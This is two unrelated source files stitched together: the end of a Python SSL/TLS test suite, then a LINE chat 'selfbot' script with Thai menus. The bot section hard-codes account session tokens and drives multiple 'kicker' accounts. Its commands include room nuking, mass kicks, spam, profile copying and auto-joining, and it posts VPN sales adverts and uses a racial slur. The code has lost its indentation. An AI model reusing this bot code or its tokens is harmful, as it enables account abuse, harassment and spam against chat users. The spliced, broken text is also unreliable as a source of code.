# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
Z.py
|
# -*- coding: utf-8 -*-
import LINETCR
#import wikipedia
from LINETCR.lib.curve.ttypes import *
#from ASUL.lib.curve.ttypes import *
from datetime import datetime
# https://kaijento.github.io/2017/05/19/web-scraping-youtube.com/
from bs4 import BeautifulSoup
from threading import Thread
from googletrans import Translator
from gtts import gTTS
import time,random,sys,json,codecs,threading,glob,urllib,urllib2,urllib3,re,ast,os,subprocess,requests,tempfile
cl =LINETCR.LINE()
#cl.login(qr=True)
cl.login(token='EpBdvSxlTymGNl6poj9c.YLgVP2FFH7O3buLlL8m1xa.XxsypSrBhHFXkAG9v7AyeOHU+aJ8T8ySnUCVFQVaWG0')
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token='EpICAa08FTHPaoZ94cj7.MRMd87JLMY8NA0SCe7JEXW.mDUfry/amiGJ9zxh+yO6rEJXmdzJc3i/70hvIeGM2Ro')
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token='Ep7FeVmjuwRpHmvcUr42.ZDFEjZ3fY8/74VuPEJeZmG.X7Yf+HMLIrNmP5F+lV/wLAVnabldnY9VdaPE8P+wU30')
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token='EpICAa08FTHPaoZ94cj7.MRMd87JLMY8NA0SCe7JEXW.mDUfry/amiGJ9zxh+yO6rEJXmdzJc3i/70hvIeGM2Ro')
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token='Ep7FeVmjuwRpHmvcUr42.ZDFEjZ3fY8/74VuPEJeZmG.X7Yf+HMLIrNmP5F+lV/wLAVnabldnY9VdaPE8P+wU30')
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token='Ep7FeVmjuwRpHmvcUr42.ZDFEjZ3fY8/74VuPEJeZmG.X7Yf+HMLIrNmP5F+lV/wLAVnabldnY9VdaPE8P+wU30')
ki5.loginResult()
cl
#ki6 = ASUL.LINE()
#AsulLogged = False
#cl = ASUL.LINE()
#cl.login(token='EoChmq5TXM73ZRg9P8ec.YLgVP2FFH7O3buLlL8m1xa.53z2MiS/devknmPfbJjsBhLEqtWnv6cUujv6wklIJsc')
#cl.loginResult()
print u"login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""". *.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
||=====คำสั่งทั่วไป=====||
➣ [Me @]➣ดูคอนแทคเพื่อน
➣ [Tr-th]➣แปลเป็นไทย
➣ [Tr-en]➣แปลเป็นอังกฤษ
➣ [Ginfo]➣ดูข้อมูลกลุ่ม
➣ [Glist]➣ส่งของขวัญ
➣ [Cancel]➣ยกเลิกเชิน
➣ [Invite]➣เชินตามคอนแทค
➣ [Invite: ]➣เชินด้วยเอมไอดี
➣ [Unban @]➣ เพิ่มบันชีขาว @
➣ [Unban:]➣ เพิ่มบันชีขาวmid
➣ [Unban on]➣ เพิ่มบันชีขาวcontact
➣ [Ban @ ]➣ เพิ่มบันชีดำ @
➣ [Ban:]➣ เพิ่มบันชีดำmid
➣ [Ban on ]➣ เพิ่มบันชีดำcontact
➣ [Clear ban]เชคแบนโชว์คอนแทค
➣ [Link on]☆เปิดลิ้ง
➣ [Link off]☆ปิดลิ้ง
➣ [Gurl]
➣ [Url ]➣ลิ้งกลุ่ม
➣ [Gname]
➣ [Banlist ]
➣ [Details grup]
➣ [on]➣ เปิดข้อความต้อนรับ
➣ [off]➣ ปิดข้อความต้อนรับ
➣ [Respon on]➣เปิดกล่างถึงคนแท้ค
➣ [Respon off]➣ปิดกล่าวถึงคนแท้ก
➣ [Inviteme:]
➣ [Info grup]
➣ [Gift-Allgift]➣ [ส่งของขวัญ-ทั้งหมด
➣ [Clear grup
➣️ [Reject]☆ลบรันตัวเอง
➣ [Mic:]☆เชคคอนแทค
➣️ [Reject1]➣ [ลบรันคิกเก้อ
➣ [Nuke]☆ล้างห้อง
➣ [Mention,Tagall]➣แทคทั้งห้อง
➣ [Kick @]➣ เตะ @
➣ [Kick::]➣ เตะmid
➣ [Bc:ct ]
➣ [Bc:grup]
➣ [Block @]
➣ [Youtube]➣ยูทูป
➣ [vdo]
➣ [Blocklist]
➣ [Spam on/off]➣รันข้อความแชท
➣ [ไวรัส01]
➣ [Bot:ct ]
➣ [Bot:grup.]
➣ [Allname:]
➣ [Allbio:]
➣ [Gc]☆ดูผู้สร้างห้อง
➣ [Speed]☆สปีดบอท
➣ [Conban]➣เชคแบน
➣ [Mycopy @] ➣ก้อปปี้โปรไฟล์
➣ [Copy1 @] ➣ ก้อปปี้คิกเก้อ1
➣ [Copy2 @] ➣ ก้อปปี้คิกเก้อ2
➣ [Copy3 @] ➣ ก้อปปี้คิกเก้อ3
➣ [Copy4 @] ➣ ก้อปปี้คิกเก้อ4
➣ [Copy5 @] ➣ ก้อปปีัคิกเก้อ4
➣ [Mybackup @ ]➣กลับคืนค���าก้อปปี้
➣ [Like:on/off] ➣ออโต้ไลค์ เปิด/ปิด
➣ [Add on/off] ➣ออโต้แอด เปิด/ปิด
➣ [Join on/off]➣ออโต้เข้ากลุ่ม เปิด/ปิด
➣ [Contact on/off]➣อ่านคอนแทค เปิด/ปิด
➣ [Leave on/off] ➣ออโต้ออกแชทรวม เปิด/ปิด
➣ [Share on/off]➣โชว์ลิ้งโพส เปิด/ปิด
➣ [Getname @]➣เชคชื่อเพื่อน
➣ [Getbio @]➣เชคตัสเพื่อน
➣ [Getprofile @]➣เชคเสตัสเพื่อน
➣ [Jam on/off]➣
➣ [Jam say:]
➣ [Com on/off]
➣ [Message set:]
➣ [Comment set:]
➣ [Pesan add:]
||===== P R O T E C T =====||
➣ [Panick:on/off]
➣ [Allprotect on/off]➣ล้อกทั้งหมด เปิด/ปิด
➣ [Protect on]☆ป้องกันเปิด/ปิด
➣ [Qrprotect on/off]☆ล้อกคิวอารโค้ตเปิด/ปิด
➣ [Inviteprotect on/off]☆เชินเปิด/ปิด
➣ [Cancelprotect on/off]ยกเชินเปิด/ปิด
➣[Staff add/remove @]
||======= FOR ADMIN =======||
*.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
Http://line.me/ti/p/~getk3333
*.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
||==============================================||
"""
help2Message ="""||=====kieline=====||
||✒️ คท - ส่งคท.ตัวเอง(Me)
||✒️ ไอดี - ส่งMidตัวเอง
||✒️ คิกเกอร์ - เชคคท.คิกเกอร์ทั้งหมด
||✒️ คิกมา - เรียกคิกเกอร์เข้ากลุ่ม
||✒️ คิกออก - สั่งคิกเกอร์ออกกลุ่ม
||✒️ แทค - แทคสมาชิก
||✒️ จุด - ตั้งจุดเชคคนอ่าน
||✒️ อ่าน - เชครายชื่อคนอ่าน
||✒️ เชคกลุ่ม - เชคข้อมูลกลุ่ม
||✒️ ลิสกลุ่ม - เชคกลุ่มที่มีทั้งหมด
||✒️ ยกเชิญ,ยก - ยกเลิกเชิญ
||✒️ Mid @ - เชคMidรายบุคคล
||✒️ ดึง - เชิญคนเข้ากลุ่มด้วยคท.
||✒️ ดึง: - เชิญคนเข้ากลุ่ม้ดวยMid
||✒️ ขาว - แก้ดำ(ส่งคท.)
||✒️ ดำ - เพิ่มบัญชีดำ(ส่งคท.)
||✒️ เชคดำ - เชคบัญชีดำ
||✒️ ล้างดำ - ล้างบัญชีดำ
||✒️ เปิดลิ้ง
||✒️ ปิดลิ้ง
||✒️ ลิ้ง - เปิดและขอลิ้งกลุ่ม
||✒️ Gname: - เปลี่ยนชื่อกลุ่ม
||✒️ ลบรัน - ลบรันตัวเอง
||✒️ ลบรัน1 - ลบรันให้เพื่อน(ขอลิ้งให้ลอคอินก่อน)
||✒️ ขอลิ้ง - ขอลิ้งให้เพื่อนลอคอิน
||✒️ . - เชคสถานะลอคอิน
||✒️ Sp - เชคสปีด
||✒️ Bot sp - เชคสปีดคิกเกอร์
||✒️ Mycopy @ - กอพปี้โปรไฟล์
||✒️ Copy @ - คิกเกอร์1กอพปี้
||✒️ Mybackup - กลับร่างเดิม
||✒️ Backup - คิกเกอร์1กลับร่างเดิม
||✒️ Spam on/off - ส่งข้อความสแปม
||==============================||
✯★Creator By *.:。 ✿*゚‘゚・✿.。.:* *.:
K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̲̅̅ ̲̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅
*.:。 ✿*゚‘゚・✿.。.:* *.
"""
helo=""
KAC=[cl,ki,ki2,ki3,ki4,ki5]
mid = cl.getProfile().mid
kimid = ki.getProfile().mid
ki2mid = ki2.getProfile().mid
ki3mid = ki3.getProfile().mid
ki4mid = ki4.getProfile().mid
ki5mid = ki5.getProfile().mid
bot1 = cl.getProfile().mid
Bots = [mid,kimid,ki2mid,ki3mid,ki4mid,ki5mid]
admsa = "uca51afa767df87ba3705494b97c3355c"
admin = "uca51afa767df87ba3705494b97c3355c"
wait = {
'contact':True,
'detectMention':True,
'autoJoin':False,
'autoCancel':{"on":False,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"selt bot by=*:K̲̲̅̅ ̲̲̅̅I̲̲̅̅ ̲̲̅̅E̲̲̅̅B̲̲̅̅O̲̅̅T̲̲̅̅ ̲̲̅̅L̲̲̅̅O̲̲̅̅V̲̲̅̅E̲̲̅̅L̲̲̅̅N̲̲̅̅E̲̲̅̅*.:。 ✿*゚‘゚・✿.。.:* *.",
"lang":"JP",
"comment":"Auto Like By ",
"welmsg":"welcome to group",
"commentOn":False,
"likeOn":True,
"wc":False,
"commentBlack":{},
"wblack":False,
"Notifed":False,
"Notifedbot":False,
"atjointicket":False,
"dblack":False,
"clock":False,
"Sambutan":False,
"tag":False,
"pesan":"☺อย่าแท้กบ่อยน่ะเดะจับเยสเรย☺",
"cNames":"",
"blacklist":{},
"group":False,
"wblacklist":False,
"dblacklist":False,
"protect":False,
"cancelprotect":False,
"inviteprotect":False,
"linkprotect":False,
}
settings = {
"simiSimi":{}
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
"ricoinvite":{},
'ROM':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
contact = cl.getProfile()
mybackup = cl.getProfile()
mybackup.displayName = contact.displayName
mybackup.statusMessage = contact.statusMessage
mybackup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
user1 = mid
user2 = ""
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
if string ==command:
return True
return False
def bot(op):
global LINETCRLogged
global ki
global user2
global readAlert
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == "u32c317f3ca4cd1a086bf38b083583948":
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
G = cl.getGroup(list_[1])
G.preventJoinByTicket = True
cl.updateGroup(G)
except:
cl.sendText(msg.to,"error")
if "MENTION" in msg.contentMetadata.keys() != None:
if wait['detectMention'] == True:
contact = cl.getContact(msg.from_)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cName = contact.displayName
msg.text1 = "@"+cName+" "
msg.text1 = "@"+cName+" "
balas = ["💗แท้กบ่อยด๋วจับเยสรุย💗"]
balas = ["มีเชลบอทลบรัน พร้อมคิกเก้อ💟\nลบบินกลุ่ม ออโต้ไลค์ และอื่นๆอีกมากมาย\n🔒กันสมาชิกเปิดลิ้งห้อง\n🔒กันรัน\n🔒กันสมาชิกเชิญคนนอกเข้า\n🔒กันสมาชิกเปลี่ยนชื่อกลุ่ม\n🔒กันคนนอกเข้ามาลบคนในกลุ่ม\n👉และมีเชิพเวอร์vpn(เน็ต) มีทั้งรายเดือนและรายวัน👈\n👉สนใจติดต่อลิ้งด้านล่างเรยครับ👈\nโอนเข้าบัญชี💲เทานั้น\nสนใจ แอดมาคุยได้\nhttp://line.me/ti/p/~getk3333\nhttp://line.me/ti/p/~getk9999"]
ret_ = msg.text1 + random.choice(balas)
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata["MENTION"])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention['M'] in Bots:
cl.sendText(msg.to,ret_)
cl.sendImageWithURL(msg.to,image)
break
#if "MENTION" in msg.contentMetadata.keys() != None:
# if wait['kickMention'] == True:
# contact = cl.getContact(msg.from_)
# cName = contact.displayName
# balas = ["Dont Tag Me!! Im Busy, ",cName + " Ngapain Ngetag?, ",cName + " Nggak Usah Tag-Tag! Kalo Penting Langsung Pc Aja, ", "-_-, ","Putra lagi off, ", cName + " Kenapa Tag saya?, ","SPAM PC aja, " + cName, "Jangan Suka Tag gua, " + cName, "Kamu siapa, " + cName + "?", "Ada Perlu apa, " + cName + "?","Tag doang tidak perlu., "]
#3 ret_ = "[Auto Respond] " + random.choice(balas)
# name = re.findall(r'@(\w+)', msg.text)
# summon(op.param1,[op.param2])
#3 mention = ast.literal_eval(msg.contentMetadata["MENTION"])
# mentionees = mention['MENTIONEES']
# for mention in mentionees:
# if mention['M'] in Bots:
# cl.sendText(msg.to,ret_)
# cl.kickoutFromGroup(msg.to,[msg.from_])
# break
if op.type == 17:
if wait["Sambutan"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
print "MEMBER JOIN TO GROUP"
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait["group"] == True:
if op.param2 in admin:
return
ginfo = cl.getGroup(op.param1)
contact = cl.getContact(op.param2)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(op.param1, "(ღ¸.✻´`✻.¸¸ღღ¸.✻´`✻.¸¸ღღ¸.✻´`✻.¸¸ღ\n\n╔════════♪•●♥●•♪════════╗\n\n 😊ยินดีต้อนรับ 😊 @" + cl.getContact(op.param2).displayName + " เข้าห้อง" + "👉" + str(ginfo.name) + "👈\n\nมีเชิพเวอร์vpnเช่าราคาถุก👇👇👇\n\nhttps://www.plang-vpn.online\n\n╚════════♪•●♥●•♪════════╝")
cl.sendImageWithURL(op.param1,image)
print "ada orang masuk grup"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER OUT GROUP
if op.type == 15:
if wait['group'] == True:
if op.param2 in bot1:
return
cl.sendText(op.param1,"ไปสะล่ะ ไว้เจอกันใหม่น่ะ @ " + cl.getContact(op.param2).displayName + " ลาก่อน\n~(^з^)-♡\n\n😍ไปแต่ตัวอย่าลืมหัวใจไปด้วยน้า😍")
print ("MEMBER HAS LEFT THE GROUP")
# ----------------- NOTIFED MEMBER JOIN GROUP
if op.type == 17:
if wait['group'] == True:
if op.param2 in bot1:
return
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1, "😊ยินดีต้อนรับ 😊 @ " + cl.getContact(op.param2).displayName + " สู่กลุ่ม " + "👉" + str(ginfo.name) + "👈""\n\n😃เข้ามาแร้วอย่าดื้อน่ะหนู😄")
print "MEMBER HAS JOIN THE GROUP"
if msg.contentType == 16:
url = msg.contentMetadata["postEndUrl"]
cl.like(url[25:58], url[66:], likeType=1001)
# ----------------- NOTIFED MEMBER JOIN GROUP
# if op.type == 17:
# if wait["group"] == True:
# if op.param2 in admin:
# return
# ginfo = cl.getGroup(op.param1)
# contact = cl.getContact(op.param2)
# image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
# cl.sendImageWithURL(op.param1,image)
# print "ada orang masuk grup"
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["ricoinvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
cl.sendText(msg.to,"Call my daddy to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
wait2["ricoinvite"] = False
break
except:
cl.sendText(msg.to,"Negative, Err0r Detected")
wait2["ricoinvite"] = False
break
if op.type == 25:
msg=op.message
if "@"+cl.getProfile().displayName in msg.text:
if wait["tag"] == True:
tanya = msg.text.replace("@"+cl.getProfile().displayName,"")
jawab = (wait["pesan"])
jawaban = (jawab)
contact = cl.getContact(msg.from_)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
cl.sendText(msg.to,jawaban)
print "ada orang tag"
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"sudah masuk daftar hitam👈")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"Itu tidak berkomentar👈")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
